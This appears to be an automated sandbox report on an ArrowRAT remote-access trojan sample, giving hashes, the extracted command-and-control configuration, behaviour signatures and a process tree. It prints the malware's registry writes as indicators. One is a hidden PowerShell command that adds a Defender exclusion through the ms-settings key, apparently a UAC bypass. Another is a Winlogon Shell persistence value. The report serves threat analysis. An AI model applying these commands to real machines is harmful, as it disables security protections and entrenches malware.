Analysis
-
max time kernel
127s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 13:31
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20241007-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
16a66efc62e16195848483277f81cb3b
-
SHA1
5b3b70e9df9b025576386abfa9ed7c342e8d7a46
-
SHA256
e694001c6e68ee030e201b680d2e1916ee121fe76f050121045a3fa2465e3ed6
-
SHA512
87d682acb2b44506711e4758762e16c3f29101c5a20c1b144ff2c337c37a82f8bd0bbf13c65bb1e5e2423bcf3f042cd9d114256846aeb5c8e66119b64d6d1393
-
SSDEEP
3072:gbzxH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPMiO8Y:gbzxe0ODhTEPgnjuIJzo+PPcfPMd8
Malware Config
Extracted
arrowrat
Pf030dc1ckld12od3
192.168.1.46:1337
QplfyCtwT
Signatures
-
Arrowrat family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
Processes:
explorer.exeClient.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings\shell Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Pan\\dora'" Client.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings\shell\open\command Client.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings\shell\open Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
Client.exepid Process 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe 2244 Client.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
Client.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 2244 Client.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe Token: SeShutdownPrivilege 2960 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
explorer.exepid Process 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
explorer.exepid Process 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid Process 2244 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
Client.exeexplorer.exedescription pid Process procid_target PID 2244 wrote to memory of 2960 2244 Client.exe 30 PID 2244 wrote to memory of 2960 2244 Client.exe 30 PID 2244 wrote to memory of 2960 2244 Client.exe 30 PID 2960 wrote to memory of 3008 2960 explorer.exe 32 PID 2960 wrote to memory of 3008 2960 explorer.exe 32 PID 2960 wrote to memory of 3008 2960 explorer.exe 32 PID 2244 wrote to memory of 2800 2244 Client.exe 31 PID 2244 wrote to memory of 2800 2244 Client.exe 31 PID 2244 wrote to memory of 2800 2244 Client.exe 31 PID 2244 wrote to memory of 2800 2244 Client.exe 31 PID 2244 wrote to memory of 1576 2244 Client.exe 33 PID 2244 wrote to memory of 1576 2244 Client.exe 33 PID 2244 wrote to memory of 1576 2244 Client.exe 33 PID 2244 wrote to memory of 1576 2244 Client.exe 33 PID 2244 wrote to memory of 2756 2244 Client.exe 34 PID 2244 wrote to memory of 2756 2244 Client.exe 34 PID 2244 wrote to memory of 2756 2244 Client.exe 34 PID 2244 wrote to memory of 2756 2244 Client.exe 34 PID 2244 wrote to memory of 2868 2244 Client.exe 35 PID 2244 wrote to memory of 2868 2244 Client.exe 35 PID 2244 wrote to memory of 2868 2244 Client.exe 35 PID 2244 wrote to memory of 2868 2244 Client.exe 35 PID 2244 wrote to memory of 2156 2244 Client.exe 36 PID 2244 wrote to memory of 2156 2244 Client.exe 36 PID 2244 wrote to memory of 2156 2244 Client.exe 36 PID 2244 wrote to memory of 2156 2244 Client.exe 36 PID 2244 wrote to memory of 2832 2244 Client.exe 37 PID 2244 wrote to memory of 2832 2244 Client.exe 37 PID 2244 wrote to memory of 2832 2244 Client.exe 37 PID 2244 wrote to memory of 2832 2244 Client.exe 37 PID 2244 wrote to memory of 2840 2244 Client.exe 38 PID 2244 wrote to memory of 2840 2244 Client.exe 38 PID 2244 wrote to memory of 2840 2244 Client.exe 38 PID 2244 wrote to memory of 2840 2244 Client.exe 38 PID 2244 wrote to memory of 2716 2244 Client.exe 39 PID 2244 wrote to memory of 2716 2244 Client.exe 39 PID 2244 wrote to memory of 2716 2244 Client.exe 39 PID 2244 wrote to memory of 2716 2244 Client.exe 39 PID 2244 wrote to memory of 2724 2244 Client.exe 40 PID 2244 wrote to memory of 2724 2244 Client.exe 40 PID 2244 wrote to memory of 2724 2244 Client.exe 40 PID 2244 wrote to memory of 2724 2244 Client.exe 40 PID 2244 wrote to memory of 1192 2244 Client.exe 41 PID 2244 wrote to memory of 1192 2244 Client.exe 41 PID 2244 wrote to memory of 1192 2244 Client.exe 41 PID 2244 wrote to memory of 1192 2244 Client.exe 41 PID 2244 wrote to memory of 2160 2244 Client.exe 42 PID 2244 wrote to memory of 2160 2244 Client.exe 42 PID 2244 wrote to memory of 2160 2244 Client.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:3008
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:1576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2156
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2832
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:1192
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2160
-